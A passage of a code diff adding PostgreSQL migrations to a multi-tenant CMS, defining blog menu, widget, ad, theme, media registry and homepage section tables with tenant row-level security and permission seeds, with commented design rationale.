+-- `isAbsoluteHttpUrl`, same defense-in-depth convention as canonical URLs).
+CREATE TABLE IF NOT EXISTS awcms_blog_menu_items (
+  id uuid PRIMARY KEY DEFAULT gen_random_uuid(),
+  tenant_id uuid NOT NULL REFERENCES awcms_tenants (id),
+  menu_id uuid NOT NULL REFERENCES awcms_blog_menus (id),
+  parent_item_id uuid REFERENCES awcms_blog_menu_items (id),
+  label text NOT NULL,
+  link_type text NOT NULL,
+  target_id uuid,
+  url text,
+  sort_order integer NOT NULL DEFAULT 0,
+  created_at timestamptz NOT NULL DEFAULT now(),
+  updated_at timestamptz NOT NULL DEFAULT now(),
+  CONSTRAINT awcms_blog_menu_items_link_type_check
+    CHECK (link_type IN ('post', 'page', 'url'))
+);
+
+CREATE INDEX IF NOT EXISTS awcms_blog_menu_items_menu_idx
+  ON awcms_blog_menu_items (tenant_id, menu_id, sort_order);
+
+ALTER TABLE awcms_blog_menu_items ENABLE ROW LEVEL SECURITY;
+ALTER TABLE awcms_blog_menu_items FORCE ROW LEVEL SECURITY;
+
+CREATE POLICY awcms_blog_menu_items_tenant_isolation
+  ON awcms_blog_menu_items
+  USING (tenant_id = current_setting('app.current_tenant_id')::uuid);
+
+-- Widgets: tenant-scoped content blocks placed at a fixed `position`. Body
+-- is plain text, escaped at render time (same whitelist convention as
+-- `content-block-rendering.ts`) — no raw-HTML field.
+CREATE TABLE IF NOT EXISTS awcms_blog_widgets (
+  id uuid PRIMARY KEY DEFAULT gen_random_uuid(),
+  tenant_id uuid NOT NULL REFERENCES awcms_tenants (id),
+  position text NOT NULL,
+  title text NOT NULL,
+  body_text text NOT NULL DEFAULT '',
+  is_active boolean NOT NULL DEFAULT true,
+  sort_order integer NOT NULL DEFAULT 0,
+  created_at timestamptz NOT NULL DEFAULT now(),
+  updated_at timestamptz NOT NULL DEFAULT now(),
+  deleted_at timestamptz,
+  deleted_by uuid,
+  delete_reason text,
+  CONSTRAINT awcms_blog_widgets_position_check
+    CHECK (position IN ('header', 'sidebar', 'footer', 'content_before', 'content_after'))
+);
+
+CREATE INDEX IF NOT EXISTS awcms_blog_widgets_position_idx
+  ON awcms_blog_widgets (tenant_id, position, sort_order)
+  WHERE deleted_at IS NULL;
+
+ALTER TABLE awcms_blog_widgets ENABLE ROW LEVEL SECURITY;
+ALTER TABLE awcms_blog_widgets FORCE ROW LEVEL SECURITY;
+
+CREATE POLICY awcms_blog_widgets_tenant_isolation
+  ON awcms_blog_widgets
+  USING (tenant_id = current_setting('app.current_tenant_id')::uuid);
+
+-- Ads: tenant-scoped advertisement records. `image_url`/`link_url` are
+-- validated absolute http(s) URLs (application layer, `domain/ad-
+-- policy.ts`) — never raw HTML/embed markup, so rendering can never become
+-- an XSS channel.
+CREATE TABLE IF NOT EXISTS awcms_blog_ads (
+  id uuid PRIMARY KEY DEFAULT gen_random_uuid(),
+  tenant_id uuid NOT NULL REFERENCES awcms_tenants (id),
+  name text NOT NULL,
+  image_url text NOT NULL,
+  link_url text,
+  is_active boolean NOT NULL DEFAULT true,
+  starts_at timestamptz,
+  ends_at timestamptz,
+  created_at timestamptz NOT NULL DEFAULT now(),
+  updated_at timestamptz NOT NULL DEFAULT now(),
+  deleted_at timestamptz,
+  deleted_by uuid,
+  delete_reason text,
+  CONSTRAINT awcms_blog_ads_schedule_check
+    CHECK (starts_at IS NULL OR ends_at IS NULL OR ends_at > starts_at)
+);
+
+ALTER TABLE awcms_blog_ads ENABLE ROW LEVEL SECURITY;
+ALTER TABLE awcms_blog_ads FORCE ROW LEVEL SECURITY;
+
+CREATE POLICY awcms_blog_ads_tenant_isolation
+  ON awcms_blog_ads
+  USING (tenant_id = current_setting('app.current_tenant_id')::uuid);
+
+-- Ad placements: where one ad is targeted. `target_id` is meaningful only
+-- for `widget`/`post`/`page` (null for `global`) — same "type gates which
+-- reference column is meaningful" convention as menu items above.
+CREATE TABLE IF NOT EXISTS awcms_blog_ad_placements (
+  id uuid PRIMARY KEY DEFAULT gen_random_uuid(),
+  tenant_id uuid NOT NULL REFERENCES awcms_tenants (id),
+  ad_id uuid NOT NULL REFERENCES awcms_blog_ads (id),
+  placement_type text NOT NULL,
+  target_id uuid,
+  created_at timestamptz NOT NULL DEFAULT now(),
+  CONSTRAINT awcms_blog_ad_placements_type_check
+    CHECK (placement_type IN ('global', 'widget', 'post', 'page'))
+);
+
+CREATE INDEX IF NOT EXISTS awcms_blog_ad_placements_lookup_idx
+  ON awcms_blog_ad_placements (tenant_id, placement_type, target_id);
+
+CREATE INDEX IF NOT EXISTS awcms_blog_ad_placements_ad_idx
+  ON awcms_blog_ad_placements (tenant_id, ad_id);
+
+ALTER TABLE awcms_blog_ad_placements ENABLE ROW LEVEL SECURITY;
+ALTER TABLE awcms_blog_ad_placements FORCE ROW LEVEL SECURITY;
+
+CREATE POLICY awcms_blog_ad_placements_tenant_isolation
+  ON awcms_blog_ad_placements
+  USING (tenant_id = current_setting('app.current_tenant_id')::uuid);
+
+-- Theme mode: one row per tenant, same shape/convention as
+-- `awcms_blog_settings` (migration 035) — a blog-scoped override of
+-- `awcms_tenants.default_theme`; absence of a row means "inherit the
+-- tenant default", not "light" (see `application/theme-settings-
+-- directory.ts`).
+CREATE TABLE IF NOT EXISTS awcms_blog_theme_settings (
+  tenant_id uuid PRIMARY KEY REFERENCES awcms_tenants (id),
+  mode text NOT NULL DEFAULT 'system',
+  created_at timestamptz NOT NULL DEFAULT now(),
+  updated_at timestamptz NOT NULL DEFAULT now(),
+  CONSTRAINT awcms_blog_theme_settings_mode_check
+    CHECK (mode IN ('light', 'dark', 'system'))
+);
+
+ALTER TABLE awcms_blog_theme_settings ENABLE ROW LEVEL SECURITY;
+ALTER TABLE awcms_blog_theme_settings FORCE ROW LEVEL SECURITY;
+
+CREATE POLICY awcms_blog_theme_settings_tenant_isolation
+  ON awcms_blog_theme_settings
+  USING (tenant_id = current_setting('app.current_tenant_id')::uuid);

--- a/sql/038_awcms_blog_content_presentation_permissions.sql
+++ b/sql/038_awcms_blog_content_presentation_permissions.sql
@@ -1,0 +1,21 @@
+-- `blog_content` module — permission catalog seed for the
+-- presentation/monetization features (templates, menus, widgets, ads,
+-- theme). Ported from awcms-mini migration 030. One `read` + one
+-- `configure` permission per resource — these are admin-configured
+-- master/config data, not lifecycle-managed content like posts (no
+-- publish/schedule/restore/purge concept applies here). No implicit role
+-- grants; assignable through the existing Access & Users management
+-- (RBAC/ABAC), same as every other module's permission seed.
+INSERT INTO awcms_permissions (module_key, activity_code, action, description)
+VALUES
+  ('blog_content', 'templates', 'read', 'Read blog presentation templates'),
+  ('blog_content', 'templates', 'configure', 'Create, update, or delete blog presentation templates'),
+  ('blog_content', 'menus', 'read', 'Read blog navigation menus'),
+  ('blog_content', 'menus', 'configure', 'Create, update, or delete blog navigation menus'),
+  ('blog_content', 'widgets', 'read', 'Read blog widgets'),
+  ('blog_content', 'widgets', 'configure', 'Create, update, or delete blog widgets'),
+  ('blog_content', 'ads', 'read', 'Read blog advertisements'),
+  ('blog_content', 'ads', 'configure', 'Create, update, or delete blog advertisements'),
+  ('blog_content', 'theme', 'read', 'Read blog theme mode setting'),
+  ('blog_content', 'theme', 'configure', 'Update blog theme mode setting')
+ON CONFLICT (module_key, activity_code, action) DO NOTHING;

--- a/sql/039_awcms_blog_content_internal_tag_links_schema.sql
+++ b/sql/039_awcms_blog_content_internal_tag_links_schema.sql
@@ -1,0 +1,47 @@
+-- `blog_content` module — automatic internal tag linking policy. Ported
+-- from awcms-mini migration 051 (its `auto_internal_tag_links_disabled`
+-- per-post column already lives on `awcms_blog_posts` since migration 035 —
+-- a fresh DB needs no separate later ALTER for it).
+--
+-- `awcms_blog_internal_tag_link_settings` — per-tenant policy override
+-- (tenant on/off switch, case-insensitive matching toggle, disabled tag id
+-- list). Deliberately a DEDICATED table, same one-row-per-tenant shape as
+-- `awcms_blog_theme_settings` (migration 037) — NOT folded into
+-- `awcms_blog_settings.settings` jsonb. Reason: that `settings` column is a
+-- catch-all `blog-settings-directory.ts`'s `upsertBlogSettings` rewrites
+-- WHOLESALE from an explicit key allowlist on every `PATCH
+-- /api/v1/blog/settings` call — a key not included in that allowlist would
+-- be SILENTLY DROPPED the next time an admin updates any other blog
+-- setting. A dedicated table avoids this entanglement entirely, and matches
+-- this feature's own separately-permissioned concern
+-- (`blog_content.internal_links.{read,configure,preview}`, distinct from
+-- `blog_content.settings.*`, seeded by migration 040) — read/written ONLY
+-- through its own directory (`internal-tag-link-settings-directory.ts`) and
+-- its own endpoint (`/api/v1/blog/internal-tag-links/settings`), never
+-- through the generic settings endpoint.
+--
+-- `disabled_tag_ids` is a plain `uuid[]` (no join table) — validated at the
+-- application layer against `awcms_blog_terms` (must exist, same tenant,
+-- `taxonomy_type = 'tag'`, not soft-deleted) before every write. A stale id
+-- left behind after a tag is later deleted is harmless (deleted tags are
+-- already excluded from the render-time candidate list regardless of this
+-- array).
+--
+-- No explicit `GRANT` needed for `awcms_app` (sql/019's `ALTER DEFAULT
+-- PRIVILEGES`); not touched by the `blog:publish:scheduled` worker, so no
+-- `awcms_worker` grant either.
+CREATE TABLE IF NOT EXISTS awcms_blog_internal_tag_link_settings (
+  tenant_id uuid PRIMARY KEY REFERENCES awcms_tenants (id),
+  enabled boolean NOT NULL DEFAULT true,
+  case_insensitive boolean NOT NULL DEFAULT false,
+  disabled_tag_ids uuid[] NOT NULL DEFAULT '{}'::uuid[],
+  created_at timestamptz NOT NULL DEFAULT now(),
+  updated_at timestamptz NOT NULL DEFAULT now()
+);
+
+ALTER TABLE awcms_blog_internal_tag_link_settings ENABLE ROW LEVEL SECURITY;
+ALTER TABLE awcms_blog_internal_tag_link_settings FORCE ROW LEVEL SECURITY;
+
+CREATE POLICY awcms_blog_internal_tag_link_settings_tenant_isolation
+  ON awcms_blog_internal_tag_link_settings
+  USING (tenant_id = current_setting('app.current_tenant_id')::uuid);

--- a/sql/040_awcms_blog_content_internal_tag_links_permissions.sql
+++ b/sql/040_awcms_blog_content_internal_tag_links_permissions.sql
@@ -1,0 +1,11 @@
+-- `blog_content` module — permission catalog seed for automatic internal
+-- tag linking. Ported from awcms-mini migration 052. Three distinct
+-- actions, deliberately kept separate from `blog_content.settings.*` (see
+-- migration 039's header) so a role can be granted read/preview access to
+-- this narrow concern without blanket `blog_content.settings.*` access.
+INSERT INTO awcms_permissions (module_key, activity_code, action, description)
+VALUES
+  ('blog_content', 'internal_links', 'read', 'Read automatic internal tag linking settings'),
+  ('blog_content', 'internal_links', 'configure', 'Configure automatic internal tag linking settings'),
+  ('blog_content', 'internal_links', 'preview', 'Preview automatic internal tag links for a post before publishing')
+ON CONFLICT (module_key, activity_code, action) DO NOTHING;

--- a/sql/041_awcms_news_media_object_registry_schema.sql
+++ b/sql/041_awcms_news_media_object_registry_schema.sql
@@ -1,0 +1,168 @@
+-- news_portal — tenant-scoped, R2-only media object metadata registry for
+-- news images (used by blog_content featured/gallery images, homepage
+-- sections, ads, SEO share images, and video thumbnails). Ported from
+-- awcms-mini (epic `news_portal` #631-#642/#649; mini migrations 041 schema +
+-- 046 orphan-lifecycle column, consolidated here into one coherent fresh-DB
+-- CREATE TABLE). Metadata only — no binary column exists or will ever be
+-- added here; the actual image bytes live in Cloudflare R2 (bucket configured
+-- via `NEWS_MEDIA_R2_*`, `news-portal/domain/news-media-r2-config.ts` —
+-- deliberately a separate bucket/credentials from `sync-storage`'s own `R2_*`).
+--
+-- ## Status enum
+--
+-- 7-state (`pending_upload|uploaded|verified|attached|orphaned|deleted|
+-- failed`): `pending_upload` = created, no bytes yet; `uploaded` = R2 PUT
+-- succeeded; `verified` = MIME/checksum/dimensions verified server-side;
+-- `attached` = actually referenced by an owning resource; `orphaned` =
+-- flagged for cleanup; `deleted` = soft-deleted status marker; `failed` =
+-- upload/verification failed. Soft delete (`deleted_at`) is ORTHOGONAL to
+-- `status` (same convention as `awcms_blog_posts`): deleting/restoring a row
+-- never rewrites `status`, only toggles `deleted_at`/`deleted_by`/
+-- `delete_reason`/`restored_at`/`restored_by`.
+--
+-- ## `owner_resource_type`/`owner_resource_id` — generic polymorphic
+-- reference, no FK
+--
+-- A loose `(text, uuid)` pair (same PATTERN as `awcms_audit_events`/
+-- `awcms_workflow_instances`'s polymorphic `resource_type`/`resource_id`),
+-- CHECK-constrained to a fixed enum, so one registry serves every consumer
+-- (blog post/page, homepage section, gallery item, ad, video thumbnail, SEO
+-- image) without a table-specific FK per consumer and without this migration
+-- depending on blog_content's schema. Both columns are NULL until a row
+-- reaches `status='attached'` (enforced by the check constraint below).
+--
+-- ## RLS / GRANT
+--
+-- `ENABLE`+`FORCE` + the standard `tenant_isolation` policy (sql/019's
+-- `awcms_app` connects as a non-owner role, so `ENABLE` alone would be inert
+-- — `FORCE` is required). No explicit `GRANT` for `awcms_app`: sql/019's
+-- `ALTER DEFAULT PRIVILEGES ... GRANT ... ON TABLES TO awcms_app` already
+-- covers every table created by the migration owner. The `awcms_worker` grant
+-- at the bottom is for the `news-media:reconcile` job (see below).
+--
+-- ## `orphaned_at` (folded in from mini migration 046)
+--
+-- Records the EXACT moment a row transitioned to `status='orphaned'` so the
+-- reconciliation job (`scripts/news-media-r2-reconcile.ts`,
+-- `bun run news-media:reconcile`) measures the orphan grace period
+-- (`NEWS_MEDIA_R2_ORPHAN_GRACE_DAYS`, default 30 days) from that moment, not
+-- from `updated_at` (which any unrelated column update would reset). A CHECK
+-- constraint (mirroring the `owner_consistency_check` idiom) keeps it non-null
+-- exactly when `status='orphaned'` and null otherwise.
+
+CREATE TABLE IF NOT EXISTS awcms_news_media_objects (
+  id uuid PRIMARY KEY DEFAULT gen_random_uuid(),
+  tenant_id uuid NOT NULL REFERENCES awcms_tenants (id),
+  module_key text NOT NULL DEFAULT 'news_portal',
+  owner_resource_type text,
+  owner_resource_id uuid,
+  storage_driver text NOT NULL DEFAULT 'cloudflare_r2',
+  bucket_name text NOT NULL,
+  object_key text NOT NULL,
+  original_filename text,
+  public_url text NOT NULL,
+  mime_type text NOT NULL,
+  size_bytes bigint,
+  checksum_sha256 text,
+  width integer,
+  height integer,
+  alt_text text,
+  caption text,
+  status text NOT NULL DEFAULT 'pending_upload',
+  orphaned_at timestamptz,
+  created_by_tenant_user_id uuid NOT NULL,
+  created_at timestamptz NOT NULL DEFAULT now(),
+  updated_at timestamptz NOT NULL DEFAULT now(),
+  deleted_at timestamptz,
+  deleted_by uuid,
+  delete_reason text,
+  restored_at timestamptz,
+  restored_by uuid,
+  CONSTRAINT awcms_news_media_objects_module_key_check
+    CHECK (module_key = 'news_portal'),
+  CONSTRAINT awcms_news_media_objects_storage_driver_check
+    CHECK (storage_driver = 'cloudflare_r2'),
+  -- Schema-level defense in depth for the object key convention
+  -- (`news-media/{tenantId}/{yyyy}/{mm}/{uuid}.{ext}`) — the application layer
+  -- (`news-media-object-key.ts`) is the primary enforcement point; this CHECK
+  -- rejects a row that somehow bypassed that helper. References this row's own
+  -- `tenant_id`, so the prefix is verified per-row.
+  CONSTRAINT awcms_news_media_objects_object_key_format_check
+    CHECK (object_key ~ ('^news-media/' || tenant_id::text || '/[0-9]{4}/[0-9]{2}/[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}\.[a-z0-9]+$')),
+  CONSTRAINT awcms_news_media_objects_status_check
+    CHECK (status IN (
+      'pending_upload', 'uploaded', 'verified', 'attached',
+      'orphaned', 'deleted', 'failed'
+    )),
+  CONSTRAINT awcms_news_media_objects_owner_resource_type_check
+    CHECK (owner_resource_type IS NULL OR owner_resource_type IN (
+      'blog_post', 'blog_page', 'homepage_section', 'gallery_item',
+      'ad', 'video_thumbnail', 'seo_image'
+    )),
+  -- Attach requires both owner columns; anything else must leave them NULL.
+  CONSTRAINT awcms_news_media_objects_owner_consistency_check
+    CHECK (
+      (status = 'attached'
+        AND owner_resource_type IS NOT NULL AND owner_resource_id IS NOT NULL)
+      OR
+      (status <> 'attached'
+        AND owner_resource_type IS NULL AND owner_resource_id IS NULL)
+    ),
+  -- `orphaned_at` is non-null exactly when `status='orphaned'`.
+  CONSTRAINT awcms_news_media_objects_orphaned_at_consistency_check
+    CHECK (
+      (status = 'orphaned' AND orphaned_at IS NOT NULL)
+      OR
+      (status <> 'orphaned' AND orphaned_at IS NULL)
+    ),
+  CONSTRAINT awcms_news_media_objects_size_bytes_check
+    CHECK (size_bytes IS NULL OR size_bytes > 0),
+  CONSTRAINT awcms_news_media_objects_width_check
+    CHECK (width IS NULL OR width > 0),
+  CONSTRAINT awcms_news_media_objects_height_check
+    CHECK (height IS NULL OR height > 0)
+);
+
+-- Object key already embeds tenant_id + a random UUID, so it can never
+-- collide across tenants in practice — the unique index is still scoped
+-- `(tenant_id, object_key)` per this repo's tenant-scoped-uniqueness
+-- convention.
+CREATE UNIQUE INDEX IF NOT EXISTS awcms_news_media_objects_tenant_key_dedup
+  ON awcms_news_media_objects (tenant_id, object_key);
+
+CREATE INDEX IF NOT EXISTS idx_awcms_news_media_objects_tenant
+  ON awcms_news_media_objects (tenant_id);
+
+CREATE INDEX IF NOT EXISTS idx_awcms_news_media_objects_tenant_created
+  ON awcms_news_media_objects (tenant_id, created_at DESC);
+
+CREATE INDEX IF NOT EXISTS idx_awcms_news_media_objects_active
+  ON awcms_news_media_objects (tenant_id, created_at DESC)
+  WHERE deleted_at IS NULL;
+
+-- Also covers the reconciliation sweep prefix (`tenant_id`, `status`
+-- WHERE deleted_at IS NULL) — the `status='orphaned'` filter is highly
+-- selective, so no dedicated `orphaned_at` index is added.
+CREATE INDEX IF NOT EXISTS idx_awcms_news_media_objects_tenant_status
+  ON awcms_news_media_objects (tenant_id, status)
+  WHERE deleted_at IS NULL;
+
+-- Owner lookup ("which media objects are attached to this blog post?").
+CREATE INDEX IF NOT EXISTS idx_awcms_news_media_objects_owner
+  ON awcms_news_media_objects (tenant_id, owner_resource_type, owner_resource_id)
+  WHERE deleted_at IS NULL AND owner_resource_type IS NOT NULL;
+
+ALTER TABLE awcms_news_media_objects ENABLE ROW LEVEL SECURITY;
+ALTER TABLE awcms_news_media_objects FORCE ROW LEVEL SECURITY;
+
+CREATE POLICY awcms_news_media_objects_tenant_isolation
+  ON awcms_news_media_objects
+  USING (tenant_id = current_setting('app.current_tenant_id')::uuid);
+
+-- `awcms_worker` least-privilege role (sql/022) — the `news-media:reconcile`
+-- job (`scripts/news-media-r2-reconcile.ts`) needs SELECT (reconciliation
+-- snapshot query), UPDATE (claim pending_upload/uploaded rows to `failed`,
+-- soft-delete stale `orphaned` rows), and DELETE (hard-delete expired `failed`
+-- rows). Its own audit INSERT reuses `awcms_audit_events` (already granted to
+-- awcms_worker in sql/022). No access to any global table.
+GRANT SELECT, UPDATE, DELETE ON awcms_news_media_objects TO awcms_worker;

--- a/sql/042_awcms_news_media_permissions.sql
+++ b/sql/042_awcms_news_media_permissions.sql
@@ -1,0 +1,24 @@
+-- news_portal — permission catalog seed for the news media registry, wiring
+-- up the constants frozen in `news-portal/domain/news-media-permissions.ts`
+-- (`NEWS_MEDIA_PERMISSIONS`) and this module's `module.ts` `permissions`
+-- array. Ported from awcms-mini migration 042. Extends the global ABAC
+-- permission catalog only — no roles/access-assignments are wired here; only
+-- tenants created AFTER this migration runs pick these up automatically via
+-- the setup bootstrap's `INSERT INTO awcms_role_permissions ... SELECT ...
+-- FROM awcms_permissions` (same limitation every prior permission-seed
+-- migration has).
+--
+-- `cancel` is a distinct, lower-risk permission from `delete` (cancel one's
+-- OWN not-yet-uploaded upload session vs. soft-deleting real metadata).
+INSERT INTO awcms_permissions (module_key, activity_code, action, description)
+VALUES
+  ('news_portal', 'media', 'create', 'Create a pending news media object / start a presigned upload session'),
+  ('news_portal', 'media', 'read', 'Read news media object metadata'),
+  ('news_portal', 'media', 'verify', 'Finalize/verify an uploaded news media object'),
+  ('news_portal', 'media', 'attach', 'Attach a verified news media object to an owning resource'),
+  ('news_portal', 'media', 'detach', 'Detach a news media object from its owning resource'),
+  ('news_portal', 'media', 'delete', 'Soft delete news media object metadata'),
+  ('news_portal', 'media', 'restore', 'Restore a soft-deleted news media object'),
+  ('news_portal', 'media', 'purge', 'Hard purge an already soft-deleted news media object'),
+  ('news_portal', 'media', 'cancel', 'Cancel one''s own not-yet-uploaded news media upload session')
+ON CONFLICT (module_key, activity_code, action) DO NOTHING;

--- a/sql/043_awcms_news_portal_tenant_state_schema.sql
+++ b/sql/043_awcms_news_portal_tenant_state_schema.sql
@@ -1,0 +1,46 @@
+-- news_portal — a tamper-proof per-tenant "has this tenant applied the
+-- news_portal_full_online_r2 preset" signal, read by the `news_media` port's
+-- `isFullOnlineR2ModeActiveForTenant` to decide whether R2-only media
+-- validation is active for a given tenant. Ported from awcms-mini migration
+-- 043.
+--
+-- ## Why a NEW, dedicated table (security-auditor finding upstream)
+--
+-- Two earlier attempts at this signal both failed: (1)
+-- `awcms_tenant_modules.enabled` is opt-out-by-default — every tenant reads
+-- as "news_portal enabled" whether or not the preset was ever applied, so it
+-- cannot distinguish "opted in" from "never touched"; (2) the generic
+-- per-tenant module settings store is directly tenant-writable through the
+-- generic module-settings endpoint (gated only by the generic
+-- `module_management.settings.update` permission, unrelated to news_portal),
+-- so a tenant could silently disable R2-only validation for themselves. This
+-- table has NO generic write endpoint anywhere; the only sanctioned writer is
+-- the preset-application entry point (`markFullOnlineR2ModeApplied`,
+-- `news-portal/application/news-portal-tenant-state.ts`). RLS FORCE'd like
+-- every other tenant-scoped table.
+--
+-- ## PORT NOTE (awcms): no writer in this base yet
+--
+-- The preset-ACTIVATION path (`apply-news-portal-preset.ts`, which called
+-- `module_management`'s `applyModulePreset`) was DROPPED in this port because
+-- `module_management`'s preset subsystem (`applyModulePreset`/`MODULE_PRESETS`/
+-- `planEnableOrder`) is not ported to this base. This table + its read helper
+-- are retained (forward-compatible) so that when that subsystem is ported the
+-- marker works from day one; until then no row is ever written, so
+-- `isFullOnlineR2ModeActiveForTenant` always resolves `false` (fail-closed) —
+-- exactly the net behavior blog_content's prior no-op adapter produced.
+--
+-- One row per tenant (tenant_id is the primary key) — this table only ever
+-- answers one yes/no question per tenant, never a list.
+CREATE TABLE IF NOT EXISTS awcms_news_portal_tenant_state (
+  tenant_id uuid PRIMARY KEY REFERENCES awcms_tenants (id),
+  full_online_r2_mode_applied_at timestamptz NOT NULL,
+  updated_at timestamptz NOT NULL DEFAULT now()
+);
+
+ALTER TABLE awcms_news_portal_tenant_state ENABLE ROW LEVEL SECURITY;
+ALTER TABLE awcms_news_portal_tenant_state FORCE ROW LEVEL SECURITY;
+
+CREATE POLICY awcms_news_portal_tenant_state_tenant_isolation
+  ON awcms_news_portal_tenant_state
+  USING (tenant_id = current_setting('app.current_tenant_id')::uuid);

--- a/sql/044_awcms_news_portal_homepage_sections_schema.sql
+++ b/sql/044_awcms_news_portal_homepage_sections_schema.sql
@@ -1,0 +1,62 @@
+-- news_portal — configurable editorial homepage section composer. Six section
+-- types, each backed entirely by EXISTING public-safe data (blog_content posts
+-- + the R2 media registry) — no new content-authoring surface, no raw HTML.
+-- Ported from awcms-mini migration 044. `video_block`/`ad_slot`/
+-- `custom_widget_block` are deliberately NOT included (out of scope /
+-- superseded by the dedicated ad_placements table in migration 045).
+--
+-- PORT NOTE (awcms): the host-resolved `/news` public render surface that
+-- consumed these sections (`homepage-section-composer.ts`/
+-- `homepage-section-rendering.ts`) is NOT ported (needs the `tenant_domain`
+-- routing module). The admin CRUD API (`/api/v1/news-portal/homepage-sections`)
+-- and its write-time reference validation ARE ported; the section rows are
+-- authored and stored here, ready for a `/news` port to render later.
+CREATE TABLE IF NOT EXISTS awcms_news_portal_homepage_sections (
+  id uuid PRIMARY KEY DEFAULT gen_random_uuid(),
+  tenant_id uuid NOT NULL REFERENCES awcms_tenants (id),
+  section_key text NOT NULL,
+  section_type text NOT NULL,
+  title text,
+  config_json jsonb NOT NULL DEFAULT '{}'::jsonb,
+  sort_order integer NOT NULL DEFAULT 0,
+  is_enabled boolean NOT NULL DEFAULT true,
+  starts_at timestamptz,
+  ends_at timestamptz,
+  created_at timestamptz NOT NULL DEFAULT now(),
+  updated_at timestamptz NOT NULL DEFAULT now(),
+  deleted_at timestamptz,
+  deleted_by uuid,
+  delete_reason text,
+  CONSTRAINT awcms_news_portal_homepage_sections_type_check
+    CHECK (section_type IN (
+      'headline', 'latest_posts', 'featured_posts', 'editor_picks',
+      'category_grid', 'gallery_block'
+    )),
+  CONSTRAINT awcms_news_portal_homepage_sections_schedule_check
+    CHECK (starts_at IS NULL OR ends_at IS NULL OR ends_at > starts_at)
+);
+
+CREATE UNIQUE INDEX IF NOT EXISTS awcms_news_portal_homepage_sections_tenant_key_dedup
+  ON awcms_news_portal_homepage_sections (tenant_id, section_key)
+  WHERE deleted_at IS NULL;
+
+CREATE INDEX IF NOT EXISTS awcms_news_portal_homepage_sections_tenant_order_idx
+  ON awcms_news_portal_homepage_sections (tenant_id, sort_order)
+  WHERE deleted_at IS NULL;
+
+ALTER TABLE awcms_news_portal_homepage_sections ENABLE ROW LEVEL SECURITY;
+ALTER TABLE awcms_news_portal_homepage_sections FORCE ROW LEVEL SECURITY;
+
+CREATE POLICY awcms_news_portal_homepage_sections_tenant_isolation
+  ON awcms_news_portal_homepage_sections
+  USING (tenant_id = current_setting('app.current_tenant_id')::uuid);
+
+-- Permission catalog seed — same "read" + "configure" action pair
+-- blog_content's ads/menus/widgets already use. No separate "reorder" action;
+-- per-section `sort_order` is just another field on the same `configure`-
+-- guarded update.
+INSERT INTO awcms_permissions (module_key, activity_code, action, description)
+VALUES
+  ('news_portal', 'homepage_sections', 'read', 'Read editorial homepage section configuration'),
+  ('news_portal', 'homepage_sections', 'configure', 'Create, update, reorder, enable/disable, or delete editorial homepage sections')
+ON CONFLICT (module_key, activity_code, action) DO NOTHING;

--- a/sql/045_awcms_news_portal_ad_placements_schema.sql
+++ b/sql/045_awcms_news_portal_ad_placements_schema.sql
@@ -1,0 +1,74 @@
+-- news_portal — R2-only advertisement placement presets. Ported from
+-- awcms-mini migration 049. Deliberately a SEPARATE, narrower table from
+-- blog_content's generic free-URL ads: every row here is R2-only BY
+-- CONSTRUCTION (`media_object_id` is a real FK into the news media registry,
+-- there is no free-text image URL column at all), so there is no need for a
+-- full-online-R2-mode runtime gate.
+--
+-- `placement_key` is a fixed preset vocabulary (the twelve values below);
+-- `recommended_size`/`allowed_media_types`/`max_items` per placement are
+-- static, code-level metadata (`news-portal/domain/ad-placement-policy.ts`'s
+-- `AD_PLACEMENT_PRESETS`). `max_items` is enforced at RENDER-selection time
+-- only (`ad-placement-rotation.ts`), NOT as a write-time cap.
+--
+-- Residual/latent risk (documented, not exploitable today): `media_object_id`
+-- is a REAL FK, so a future hard-purge of a still-referenced media object
+-- would fail with a raw Postgres FK-violation. There is no purge endpoint in
+-- this port, so this cannot be triggered via any existing endpoint; whichever
+-- issue adds one MUST catch the FK violation (or pre-check referencing rows).
+CREATE TABLE IF NOT EXISTS awcms_news_portal_ad_placements (
+  id uuid PRIMARY KEY DEFAULT gen_random_uuid(),
+  tenant_id uuid NOT NULL REFERENCES awcms_tenants (id),
+  placement_key text NOT NULL,
+  name text NOT NULL,
+  media_object_id uuid NOT NULL REFERENCES awcms_news_media_objects (id),
+  link_url text,
+  rotation_mode text NOT NULL DEFAULT 'latest',
+  priority integer NOT NULL DEFAULT 0,
+  is_active boolean NOT NULL DEFAULT true,
+  starts_at timestamptz,
+  ends_at timestamptz,
+  created_at timestamptz NOT NULL DEFAULT now(),
+  updated_at timestamptz NOT NULL DEFAULT now(),
+  deleted_at timestamptz,
+  deleted_by uuid,
+  delete_reason text,
+  CONSTRAINT awcms_news_portal_ad_placements_placement_key_check
+    CHECK (placement_key IN (
+      'header_banner', 'below_headline', 'homepage_middle', 'homepage_bottom',
+      'article_top', 'article_middle', 'article_bottom',
+      'sidebar_top', 'sidebar_middle', 'sidebar_bottom',
+      'category_archive_top', 'search_result_top'
+    )),
+  CONSTRAINT awcms_news_portal_ad_placements_rotation_mode_check
+    CHECK (rotation_mode IN ('latest', 'priority', 'random_safe', 'weighted')),
+  CONSTRAINT awcms_news_portal_ad_placements_priority_check
+    CHECK (priority >= 0),
+  CONSTRAINT awcms_news_portal_ad_placements_schedule_check
+    CHECK (starts_at IS NULL OR ends_at IS NULL OR ends_at > starts_at)
+);
+
+-- Supports both the admin listing (filter/group by placement) and the
+-- render-time "active ads for this placement" query.
+CREATE INDEX IF NOT EXISTS awcms_news_portal_ad_placements_tenant_key_idx
+  ON awcms_news_portal_ad_placements (tenant_id, placement_key)
+  WHERE deleted_at IS NULL;
+
+-- FK lookup index (doc 10 convention: every foreign key gets an index).
+CREATE INDEX IF NOT EXISTS awcms_news_portal_ad_placements_media_object_id_idx
+  ON awcms_news_portal_ad_placements (media_object_id);
+
+ALTER TABLE awcms_news_portal_ad_placements ENABLE ROW LEVEL SECURITY;
+ALTER TABLE awcms_news_portal_ad_placements FORCE ROW LEVEL SECURITY;
+
+CREATE POLICY awcms_news_portal_ad_placements_tenant_isolation
+  ON awcms_news_portal_ad_placements
+  USING (tenant_id = current_setting('app.current_tenant_id')::uuid);
+
+-- Permission catalog seed — same "read" + "configure" action pair every other
+-- admin-configured-master-data resource in this epic uses.
+INSERT INTO awcms_permissions (module_key, activity_code, action, description)
+VALUES
+  ('news_portal', 'ad_placements', 'read', 'Read news portal advertisement placement configuration'),
+  ('news_portal', 'ad_placements', 'configure', 'Create, update, enable/disable, or delete news portal advertisement placements')
+ON CONFLICT (module_key, activity_code, action) DO NOTHING;

--- a/src/modules/_shared/offset-pagination.ts
